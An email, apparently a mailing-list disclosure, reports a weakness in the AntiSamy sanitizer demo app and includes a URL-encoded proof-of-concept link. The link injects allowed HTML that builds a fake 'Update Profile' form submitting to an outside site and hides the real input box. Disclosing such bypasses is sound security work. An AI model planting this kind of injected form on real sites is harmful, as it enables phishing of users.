Arshan,<br><br>I found an area of antisamy that can be exploited.&nbsp; It looks like the trouble is that I can insert non malicious html tags that interact with the page itself.&nbsp; So, while I can&#39;t get malicious javascript in to your page, I can create a nice looking form that redirects to somewhere that does have malicious code.<br>
<br>Here is the link (its safe):<br><a href="http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp?profile=Please+update+me.+No+really%2C+put+something+in+and+hit+update.%0D%0A%3Ctable%3E%0D%0A%3Ctr%3E%3Ctd%3E%0D%0A%3Ctextarea+rows%3D%223%22+cols%3D%2240%22+name%3D%22profile%22%3E+%3C%2Ftextarea%3E%0D%0A%3C%2Ftd%3E%0D%0A%3Ctd+valign%3D%22top%22%3E%0D%0A%09%3Cform+id%3D%22michaelForm%22+method%3D%22GET%22+action%3D%22http%3A%2F%2Fgoogle.com%2Fsearch%22%3E%0D%0A%09%09%3Cselect+name%3D%22policy%22%3E%0D%0A%09%09%09%3Coption%3Eantisamy-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-slashdot-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-ebay-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-myspace-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%3C%2Fselect%3E%0D%0A%09%09%3Cinput+type%3D%22hidden%22+name%3D%22q%22+value%3D%22Hi+Arhsan%21%21+Where+should+we+redirect+today%3F%22+%2F%3E%0D%0A%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22Update+Profile%22%3E%0D%0A%3C%2Ftd%3E%0D%0A%0D%0A%09%3C%2Fform%3E%0D%0A%3C%2Ftable%3E%0D%0A%0D%0A%3Chr%3E%0D%0A%3Ctable+border%3D%220%22+cellpadding%3D%221000%22%3E%0D%0A%3Ctr%3E%3Ctd%3E%3C%2Ftd%3E%3C%2Ftr%3E%0D%0A%0D%0A%3C%2Ftable%3E%0D%0AI+couldn%27t+delete+the+actual+input+box%2C+so+I+just+hid+it+a+bit.+%3A%29&amp;policy=antisamy-1.1.1.xml">http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp?profile=Please+update+me.+No+really%2C+put+something+in+and+hit+update.%0D%0A%3Ctable%3E%0D%0A%3Ctr%3E%3Ctd%3E%0D%0A%3Ctextarea+rows%3D%223%22+cols%3D%2240%22+name%3D%22profile%22%3E+%3C%2Ftextarea%3E%0D%0A%3C%2Ftd%3E%0D%0A%3Ctd+valign%3D%22top%22%3E%0D%0A%09%3Cform+id%3D%22michaelForm%22+method%3D%22GET%22+action%3D%22http%3A%2F%2Fgoogle.com%2Fsearch%22%3E%0D%0A%09%09%3Cselect+name%3D%22policy%22%3E%0D%0A%09%09%09%3Coption%3Eantisamy-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-slashdot-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-ebay-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-myspace-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%3C%2Fselect%3E%0D%0A%09%09%3Cinput+type%3D%22hidden%22+name%3D%22q%22+value%3D%22Hi+Arhsan%21%21+Where+should+we+redirect+today%3F%22+%2F%3E%0D%0A%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22Update+Profile%22%3E%0D%0A%3C%2Ftd%3E%0D%0A%0D%0A%09%3C%2Fform%3E%0D%0A%3C%2Ftable%3E%0D%0A%0D%0A%3Chr%3E%0D%0A%3Ctable+border%3D%220%22+cellpadding%3D%221000%22%3E%0D%0A%3Ctr%3E%3Ctd%3E%3C%2Ftd%3E%3C%2Ftr%3E%0D%0A%0D%0A%3C%2Ftable%3E%0D%0AI+couldn%27t+delete+the+actual+input+box%2C+so+I+just+hid+it+a+bit.+%3A%29&amp;policy=antisamy-1.1.1.xml</a><br>
<br>Hey, looks like Google knows how to spell your name :)<br><br>Thanks,<br>Michael<br clear="all"><br>-- <br>Michael Coates<br>email: <a href="mailto:mwcoates@gmail.com">mwcoates@gmail.com</a><br><br><a href="http://michaelcoates.wordpress.com">http://michaelcoates.wordpress.com</a>